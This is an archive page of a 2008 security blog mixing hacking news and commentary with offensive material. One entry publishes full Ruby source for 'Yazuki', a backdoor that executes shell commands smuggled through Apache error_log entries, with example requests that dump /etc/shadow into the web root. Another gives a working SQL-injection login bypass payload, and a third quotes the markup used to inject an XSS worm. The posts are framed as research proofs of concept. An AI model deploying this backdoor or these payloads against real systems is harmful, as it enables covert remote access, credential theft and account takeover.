header

root@server:~# dd if=/dev/hacking of=/dev/wired bs=1337k

08th - July - 2008 - 20:00 - #permalink

Justin.tv hit by XSS Worm

justin_tv

Another XSS Worm has come to life. This time the video and chatting community [justin.tv] has been hit by a XSS Worm, that was non-malicious and only a Proof-of-Concept another time. The worm has been coded and set to life by the authors of the website [www.thedefaced.org]. The original news I have read can be found on [xssed.com]. x2Fusion from TheDefaced has stated the following concerning the worm:

This actually is the very first XSS worm which we have unleashed,
and it was solely upon research reasons; non-malicious at all :)

We've contacted the JTV Programmers prior to the fixing of the XSS worm
and have sorted things out with them and made sure that they knew NO
information such as IP Address, Cookies, Sessions and further
information which poses private is not to be released. After that
I put myself forward and found another XSS in turn to prove that
I was dedicated to helping JTV out in any further possible
vulnerabilities.
	

The worm has been made possible due to a bad (no) sanitization of the "Location" field in the users profile. It was possible to inject arbitrary commands and the authors used the following to inject the worms code:

<iframe id='tframeid' width=0 height=0 frameborder=0></iframe>
<script src="justinworm.js" language="javascript"></script>"
	

The authors of xssed.com have made a graphic (PNG) showing the development of the worm in the network of justin.tv, look [here].

The worms source code can be found on [worms.xssing.com/sources/justintv.txt]. It is open to everyone due to the fact, that the autors coded it for educational purpose only. Furthermore the vulnerability is still fixed, to be precise it has been fixed on Sun, 29 Jun 2008 21:12:21 GMT.

What to say? Well, another time an XSS Worm has found its way to light, comprosing 2525 profiles at all and again it was NOT malicious! XSS Worms are still very young in the web and there are about one dozen around, all publicly available to learn from them, BUT and this is the problem: I guess it won't take very long anymore till the first malicious people come into the game and use the knowledge the good guys also have to do "bad" stuff. The potential is immense. Just imagine a malicious XSS Worm would manipulate the profile of a user and embed a manipulated SWF file into it, that will automatically try to attack users browser to execute arbitrary commands on the victims machine and install malware, for botnets, for spam, for whatever might be interesting. The time will come, if website administrators don't learn it NOW they will soon learn it the hard way. It is still time to learn it the soft way, by the help of such people like x2Fusion, who do ethical hacking, but it won't stay like this forever!

08th - July - 2008 - 08:00 - #permalink

Wired-Security readers know first

Reading my emails todays morning I also received one by a friend of mine (Marko Rogge), which pointed me to a Heisec news entry. The news entry can be found [here] and is titled with "MSN-Phishing und Link-Spam greift um sich", which translates to something like "MSN-Phishing and Link-Spam is increasing". This entry has been made on the 7th of July or in other words: Yesterday. Readers of Wired-Security know this problem till one month, check the archive for the [news].

Furthermore the news entry of Heise is not very informative, it does not say a lot about the whole problem, nothing about the website, the hoster etc... And there is one specific point missing: The problem is not only a problem of MSN, the website of the Phishers also includes a login field for ICQ. All that is missing in the entry of Heise.

What shall I say? I am quite angry about this news because I informed Heise in an email ONE MONTH ago and I can proof this and they totally ignored my email and NOW, after one month they write about it as if THEY found this out. This is not only unprofessional, this keeps user to a risk for over 30 days being uninformed!

To proove I am not lying, here is the source code of my email sent to them:

MIME-Version: 1.0
Date: Wed, 4 Jun 2008 22:31:25 +0200
From: <skyout@wired-security.net>
To: red@heisec.de
Subject: MSN/ICQ Phishing
Message-ID: <61a07e03c1e1286dd80dd97b20947d7e@s2.nexpaserver.de>
X-Sender: skyout@wired-security.net
User-Agent: RoundCube Webmail
Content-Type: text/plain; charset="UTF-8"
Content-Transfer-Encoding: 8bit

http://wired-security.net/archive/2008/june/index.php#04_2_062008

Please look closer at this and maybe blog about it. If you do so,
please be so fair to link back to my blog. Thanks. SkyOut.
	

Look at the date: 4th of JUNE! So instead of being so fair to blog about it and link back to my blog say instead ignored it and make their users believe they have found something new one month later then my users know it... This is unprofessional and awkward!

Conclusion: Next time I won't inform Heise anymore. Let them be uninformed if they can not even credit those, who informed them.

06th - July - 2008 - 04:30 - #permalink

Apache error_log Backdoors (DE)

hakin9

It's been quite a while since I posted my last Hakin9 article here, but now it is time for a new article. I planned to release it much earlier, so sorry for the delay. The article is called "Apache error_log Backdoors" and has been released in Hakin9 2/2008 (March).

The theory of the article is the following: Every time a user connects to an Apache webserver and tries to access a website, that is not there, an information about this access gets written to the error_log file of Apache, which is normally stored in /var/www/logs/error_log. We will use this feature to get shell commands, that then get executed. I have coded a Proof-of-Concept code called Yazuki in Ruby, that demonstrates a simple backdoor, look here:

#!/usr/bin/env ruby

# Name: Yazuki
# Author: SkyOut
# Date: October 2007
# Website: http://wired-security.net/

# Used Ruby Version. 1.8.4
# Tested on: OpenBSD 4.1

# This Proof-of-Concept code shows a simple backdoor
# concept, that does not need any open port to execute
# shell commands. Yazuki will search the error_log file
# of Apache every 5 seconds for a specified password and
# executes the given command, that can have up to five
# arguments (for more, just edit line 41).

# Possible commands: (Make sure to always have five arguments
# or edit line 41)
# less /etc/passwd > /var/www/htdocs/pw.txt ;
# ls -a /home > /var/www/htdocs/home.txt

# Start an indefinite loop
x = 0
while (x == 0)

	# Define the error_log file of Apache
	error_log = "/var/www/logs/error_log"

	# Open Apaches error_log file
	if (File.file?(error_log))
		if (File.readable?(error_log))
			File.open("#{error_log}").each { |line|

			# Define the password
			if line =~ /password/
			# Make an array of the error_log line
			array = line.split(" ");
			# Take the 5 last arguments
			command = array.fetch(13) + " " + \
			array.fetch(14) + " " + array.fetch(15) \
			+ " " + array.fetch(16) + " " + array.fetch(17)
			# Execute the command
			IO.popen("#{command}")

			# Truncate the error_log file again
			if (File.writable?(error_log))
			File.truncate(error_log, 0)
			end
			end
			}
		end
	end

	# Wait 5 seconds
	sleep 5

end
	

How does this code work? Well, it is very simple. We define a password (for example "password" (you should choose something better of course)) and then we connect to the server like this:

GET /password [our shell commands go here] HTTP/1.1
Host: www.example.com
[newline]
[newline]
	

So, let's say we have installed our backdoor as root, then we could for example send the following command to the webserver:

GET /password cat /etc/shadow > /var/www/htdocs/shadow ; HTTP/1.1
Host: www.example.com
[newline]
[newline]
	

Now of course this file won't exist, so it will drop an error in error_log. That file is searched through by our backdoor every 5 seconds and if our program finds a line, which contains our specified password it will take the 5 commands after this, put it together and send it to the underlying command shell. In the code this are the following lines:

if line =~ /password/

array = line.split(" ");

command = array.fetch(13) + " " + \
array.fetch(14) + " " + array.fetch(15) \
+ " " + array.fetch(16) + " " + array.fetch(17)

IO.popen("#{command}")
	

After that the file gets truncated again and we can now read the shadow file connecting to the webserver as follows:

GET /shadow HTTP/1.1
Host: www.example.com
[newline]
[newline]
	

The whole article printed in Hakin9 can be found [here] (Texts -> Attack).

The Proof-of-Concept code can be found [here] (Releases -> Hacking/Cracking).

06th - July - 2008 - 03:30 - #permalink

HTTP GET Request in C (Win32)

I am just developing a program, that uses a GET Request to get data from a website. The first basic steps are done. Thanks to the help from WildCat. If you want to look at the first steps, here we go. The headers and stuff:

#include <stdio.h>
#include <windows.h>
#include <winsock2.h>

#pragma comment(lib, "ws2_32.lib")

#define MAX_PATH 512
#define PORT 80

SOCKET sock;
SOCKADDR_IN remote_addr;
	

Then we have a function to set the host (could also be used to get the IP out of a hostname, see the lines commented out):

//u_long getip(const char *host)
void sethost(const char *host)
{
struct hostent *hp;
u_long host_ip;

host_ip = inet_addr(host);

if(host_ip == INADDR_NONE)
{
if((hp = gethostbyname(host)) != NULL)
{
//host_ip = *(u_long *)hp->h_addr_list[0];
sock = socket(AF_INET, SOCK_STREAM, 0);
memset(&remote_addr, 0, sizeof(SOCKADDR_IN));
remote_addr.sin_family = AF_INET;
remote_addr.sin_port = htons(PORT);
memcpy(&remote_addr.sin_addr,hp->h_addr_list[0],hp->h_length);
}
}

//return host_ip;
}
	

And finally the main() function to send the GET Request:

int main()
{
WSADATA wsaData;

char buffer[MAX_PATH];
char recvbuff[MAX_PATH];
int recvbufflen = MAX_PATH;
int res;

WSAStartup(MAKEWORD(2, 0), &wsaData);

sock = socket(AF_INET, SOCK_STREAM, 0);

sethost("www.example.com");

connect(sock, (SOCKADDR*)&remote_addr, sizeof(SOCKADDR));

sprintf(buffer, "GET / HTTP/1.0\r\nHost: www.example.com\r\n\r\n");
send(sock, buffer, strlen(buffer), 0);

res = recv(sock, recvbuff, recvbufflen, 0);
if (res > 0)
{
// do stuff here ...
}

WSACleanup();
return 0;
}
	

In future I will blog a bit more about this if it goes further!

05th - July - 2008 - 00:30 - #permalink

Data of 41000 citizens in the net

chaosknoten

The Chaos Computer Club printed a news about a big data problem occurring on the website of the market research institution TNS Infratest/Emnid. It was possible to get informations about 41000 (maybe more) citizens, that worked together with the institutions. The problem was as simple as shocking as stupid. The URL of the website looked like the following: www.report-global.com/mimitacon/[some stuff]/pages/business/masterdata.aspx?fromWhere=base&id=11XXXX. When you logged in with a working account you first of only saw the details of that specific account, but when you just changed the field "id" it was possible to see the data profiled of other citizens. With a simple Python script the CCC was able to get about 41000 data sets.

What is really shocking is how detailed those reports were. Your email adress has been written there, your date of birth, your phone number. Futhermore very sensitive data could be seen, like your incomes, your job, your health insurance, your bank informations, your credit cards used and much more...

How was the CCC able to get to those informations, did they hacked into it? No, not really... They got a mail with a valid account and looked closer at the website. That simple, that shocking.


The original article at [www.ccc.de].

04th - July - 2008 - 04:30 - #permalink

All your data are belong to us

youtube

Not being in the best mood anyway, I just came accross a news on the blog of wired.com, which really shocked me: All YouTube logs have to be handed over to a company called Viacom. The whole logs are of a size of 4 Terrabyte, including users names and IP adresses, all the videos they have watched and everything they did on the website of YouTube. Viacom filed suit against Google in March 2007 for allowing users to upload copyright protected material to YouTube and they speak of a damage to them of 1 billion USD. Now Google is forced to give over ALL their logs to Viacom and they want to proof with this, that people are watching a lot of copyright protected material, more then free material.

Viacom even wanted more, wanted to have a copy of every video marked as private and more. This has been denied, but nevertheless the story is quite shocking to me. What is this all going to become in future? The whole concept of Web 2.0 seems at risk as companies force websites to shut down if they feel, that copyright laws are broken. This case is a perfect example for this and it's even worse, that Viacom now has the right to get the logs, decided by a court on Wednesday.

How is this all going to become in future? Are all those great project forced down by companies? That would be very bad as it would turn the internet to something else than it is now.


Original post: [blog.wired.com].

03rd - July - 2008 - 00:30 - #permalink

CFP for 25c3 opened now

chaosknoten

The Call For Participation/Papers for the annual congress of the Chaos Computer Club has opened its gate. You can now hand in your ideas you would like to talk, make a workshop about or whatever. The topics are as always: Hacking, Making, Science, Society, Culture and Community. From the page of the Chaos Computer Club:

Criteria by which we assess a lecture

*  we consider the topic in general relevant for the participants
* we consider the topic currently relevant for the participants
* we consider the topic interesting, fun and worthy to be known more
  about
* the lecture is about something the speaker made himself
* we think the lecture might be fun
* the lecture is part of a workshop (has a second part which is a
  workshop)
* the lecture presents something new
* the more information provided about the lecture and the speaker
  the better
	

The following "Dates and Deadlines" have been set:

* October 5th, 2008 (Midnight UTC) Submission due
* November 7th, 2008 (Midnight UTC) Final notification of
  acceptance (or earlier)
* November 28th, 2008 (Midnight UTC) Final papers due
* December 27th - 30th, 2008 Chaos Communication Congress
	

To submit something go to [cccv.pentabarf.org/submission/25C3].

02nd - July - 2008 - 20:00 - #permalink

The "Jonny Hell" case

jonny_hell_small
(click to enlarge image)

It's been quite a while since a topstory about a hacker has found its way into the media, but now it happened again. Talking to my father tomorrow he told me, that he has read a story in the newspaper about a guy called Aleksandr Suvorov, better known in the internet as "Jonny Hell", who has been caught at Frankfurt (Main) International Airport by Secret Service agents of the US and brought to prison. I read it also in the internet, coming across "Spiegel Online". The story is very interesting because of several things.

First of all it has to be said, that some newspapers talk of Aleksandr Suvorov as the worldwide most wanted hacker (which is typically for media to make it more shocking *no comment*) and for sure he is a big fish, that they got, no question. "Spiegel Online" talks of millions of stolen credit cards, that caused a damage to the people and companies of more then 100 million USD. Some other newspapers talk of only a few million. All in all the story is not totally clear, the media hype is immense. For example the "hack" of a cafe in the state of New York gave the hackers access to 5000 credit card numbers. But look closer:

Jonny Hell isn't such a case like every other one. Many things are unclear and the way his seizure happened is against law! That has to be stated. Secret Service agents have NO right to catch a person on german ground and bring him to prison. Furthermore the warrants of arrest for installing a trojan (packet sniffer) on the restaurants computer has been written out on the 12th of March this year. One week AFTER the seizure. What is also interesting is HOW LONG it takes until such a story comes to public newspapers. It takes months until the people are informed about what happened.

Let me make a cut here of the story of "Jonny Hell" and let's turn around. Is this really a rare case? Did this only happen to him and because he is SO DANGEROUS? Or can this happen to every little and small fish out there, evil or not, guilty or not? The answer is simple: It can happen to everyone and it did. If you are part of the german hacker community you should still know it, if not I will tell you. A person known under the handle of Rembrandt has been caught similar, but much more rudely on the 22nd of March in 2007 in a restaurant in Berlin by agents, that not even said, who they are or what they want. They took him with them in a car and brought him to a place he did not know of, no chance to find out where he was. He had to sign a statement to be left free and they told him if he would not sign it, they could keep him for days and longer. They wanted to scare him and make him admit, that he has hacked into the network of the Deutsche Bank for more than half a year. Even until today there has been no official charge against him, but the consequences of your apartment being raided, yourself being kept in a prison without the right to call a lawyer and more, are more fatal then a charge could be. Your chances to get a well paid job in the security industry equal almost zero.

Think about it: Do you still think democracy works? Do you think it is more then a word written on a paper? If yes, why can it happen, that people get caught by agents, that have no right to and won't face consequences for doing so? Why can it happen, that people are forced to sign a statement without speaking to a lawyer, without knowing what's actually going on, without a PROOF!? ... Take a moment, think about it.

02nd - July - 2008 - 02:00 - #permalink

Why ICQ sucks

icq

I was at work today, chatting with some friends on ICQ. Around 18 o' clock I went home and wanted to log in to my account again, which resulted in an error message by Pidgin. My instant messenger could not log in to ICQ anymore, but instead gave me the message "Your version is not up-to-date to work with ICQ, go to http//pidgin.im/". I guess millions have seen this message and the site was no longer reachable, could be a logical DDoS, whatever. To make Pidgin work again you would have to recompile the whole program and change a value in the header file oscar.h from 0x010a to 0x010b. For linux users this might work out, but for Windows it is really annoying. So, why does ICQ do this? Simple answer: They want to force people to upgrade to ICQ 6, their new and "cooler" version of the client. If you check the whole thing with Wireshark while connecting you will get to see something like this (tip: look for the *.exe, that is, what they want you to download and install):

Frame 35 (669 bytes on wire, 669 bytes captured)
Ethernet II, Src: ZonetTec_e1:57:32 (00:50:22:e1:57:32), \
Dst: *:*:* (*:*:*:*:*:*)
Internet Protocol, Src: 64.12.161.153 (64.12.161.153), \
Dst: *.*.*.* (*.*.*.*)
    Version: 4
    Header length: 20 bytes
    Differentiated Services Field: 0x00 (DSCP 0x00: Default; ECN: 0x00)
    Total Length: 655
    Identification: 0x8aa2 (35490)
    Flags: 0x04 (Don't Fragment)
    Fragment offset: 0
    Time to live: 105
    Protocol: TCP (0x06)
    Header checksum: 0xb325 [correct]
    Source: 64.12.161.153 (64.12.161.153)
    Destination: *.*.*.* (*.*.*.*)
Transmission Control Protocol, Src Port: aol (5190), \
Dst Port: 11234 (11234), Seq: 11, Ack: 102, Len: 615
    Source port: aol (5190)
    Destination port: 11234 (11234)
    Sequence number: 11    (relative sequence number)
    [Next sequence number: 626    (relative sequence number)]
    Acknowledgement number: 102    (relative ack number)
    Header length: 20 bytes
    Flags: 0x18 (PSH, ACK)
    Window size: 16384
    Checksum: 0x7577 [correct]
        [Good Checksum: True]
        [Bad Checksum: False]
    [SEQ/ACK analysis]
    [PDU Size: 615]
AOL Instant Messenger
    Command Start: 0x2a
    Channel ID: Close Connection (0x04)
    Sequence Number: 26668
    Data Field Length: 609
    TLV: Unknown
        Value ID: Unknown (0x008e)
        Length: 1
        Value
    TLV: Screen name
        Value ID: Screen name (0x0001)
        Length: 9
        Value: 410996901
    TLV: BOS server string
        Value ID: BOS server string (0x0005)
        Length: 17
        Value: 64.12.25.112:5190
    TLV: Authorization cookie
        Value ID: Authorization cookie (0x0006)
        Length: 256
        Value
    TLV: Error Code
        Value ID: Error Code (0x0008)
        Length: 2
        Value: 28
    TLV: Error URL
        Value ID: Error URL (0x0004)
        Length: 46
        Value: http://ftp.icq.com/pub/ICQ6/Install_ICQ6U2.exe
    TLV: Latest Beta Build
        Value ID: Latest Beta Build (0x0040)
        Length: 4
        Value: 11
    TLV: Latest Beta Name
        Value ID: Latest Beta Name (0x0043)
        Length: 9
        Value: 5.33.3000
    TLV: Latest Beta URL
        Value ID: Latest Beta URL (0x0041)
        Length: 46
        Value: http://ftp.icq.com/pub/ICQ6/Install_ICQ6U2.exe
    TLV: Latest Beta Info
        Value ID: Latest Beta Info (0x0042)
        Length: 52
        Value: http://download.icq.com/download/icq6/whats_new.html
    TLV: Latest Release Build
        Value ID: Latest Release Build (0x0044)
        Length: 4
        Value: 11
    TLV: Latest Release Name
        Value ID: Latest Release Name (0x0047)
        Length: 9
        Value: 5.33.3000
    TLV: Latest Release URL
        Value ID: Latest Release URL (0x0045)
        Length: 46
        Value: http://ftp.icq.com/pub/ICQ6/Install_ICQ6U2.exe
    TLV: Latest Release Info
        Value ID: Latest Release Info (0x0046)
        Length: 52
        Value: http://download.icq.com/download/icq6/whats_new.html
	
01st - July - 2008 - 15:30 - #permalink

Code Injection? (2)

Last month I talked a about a possible Code Injection in a PHP file, that did not occurr as I found out with some help of another person. Then this person suggested, that a stacked query could work to inject SQL commands, but also this did not work because mysql_query() does not allow stacked queries. All about this you can find in the [archive]. But why do I write about it again? Because there is a possible way to inject SQL commands and bypass the script! Let's look at it again. This is the script:

[...]
$anmeldename=$_POST['anmeldename'];
$passwort=$_POST['passwort'];
$sql="SELECT * FROM `member` WHERE `Anmeldename`='$anmeldename'";
$erg=mysql_query($sql);
$zeile = mysql_fetch_object($erg);
$spw=md5($passwort);
if($zeile->Passwort==$spw)
[...]
	

So how can we bypass this script? Let's assume, that the table "members" has two columns: "Anmeldename" and "Passwort". So the table should look like this:

+-------------+----------------------------------+
| Anmeldename | Passwort                         |
+-------------+----------------------------------+
| admin       | unknown to us                    |
+-------------+----------------------------------+ 
	

So, now the interesting thing are the last two lines. The password gets hashed with MD5 and is saved to $spw. Then the most interesting part comes in. The first line, that is given back by mysql_fetch_object() is searched for the field "Passwort" and that result is compared to the MD5 hash of the POSTed password. Okay now don't talk endless, here is the injection:

Anmeldename: x' LIMIT 0 UNION ALL SELECT 'admin', \
'9990775155c3518a0d7917f7780b24aa

Passwort: ttt
	

What does happen here? The query will finally look like this if the injection works: "SELECT * FROM `member` WHERE `Anmeldename`='x' LIMIT 0 UNION ALL SELECT 'admin','9990775155c3518a0d7917f7780b24aa'". Which will result in a table looking like this:

+-------------+----------------------------------+
| Anmeldename | Passwort                         |
+-------------+----------------------------------+
| admin       | 9990775155c3518a0d7917f7780b24aa |
+-------------+----------------------------------+ 
	

And now we give the password "ttt" to the script, which is "9990775155c3518a0d7917f7780b24aa" as a MD5 hash! So finally "if($zeile->Passwort==$spw)" gets this "if(9990775155c3518a0d7917f7780b24aa==9990775155c3518a0d7917f7780b24aa)" and that is TRUE, which results in? Guess? Yeap, you are logged in!

Thanks go to [WildCat], who has tested this for me and can say for sure, that it works under PHP 5 plus MySQL 5!


UPDATE: Another time I have to update this news (seems like they never want to end). Veda again messaged me and told me it will work as a Code Injection if you use backticks. As a proof-of-concept he opened up the PHP interpreter on his local machine and did the following:

% php -a
php > print md5();

Warning: md5() expects at least 1 parameter, 0 given in php shell \
code on line 1
php > print md5(x);
9dd4e461268c8034f5c8564e155c67a6
php > print md5(`mkdir foo`);
[...]
% ls
foo
	

No comment from my side! I hope that's it! EOF!


UPDATE 2: So another update... I won't comment this anymore, look for yourself:

joern@heaven:~$ cat test.php 
<?

$string = "`touch skyout-win`";
echo md5(x)."\n";
echo md5('')."\n";
echo md5(`touch  skyout-fail`)."\n";;
echo md5($string)."\n";;

?>
joern@heaven:~$ php test.php
9dd4e461268c8034f5c8564e155c67a6
d41d8cd98f00b204e9800998ecf8427e
d41d8cd98f00b204e9800998ecf8427e
70f42a7d8d215d0c5f0078b58ca5730f
joern@heaven:~$ ls skyout*
skyout-fail
joern@heaven:~$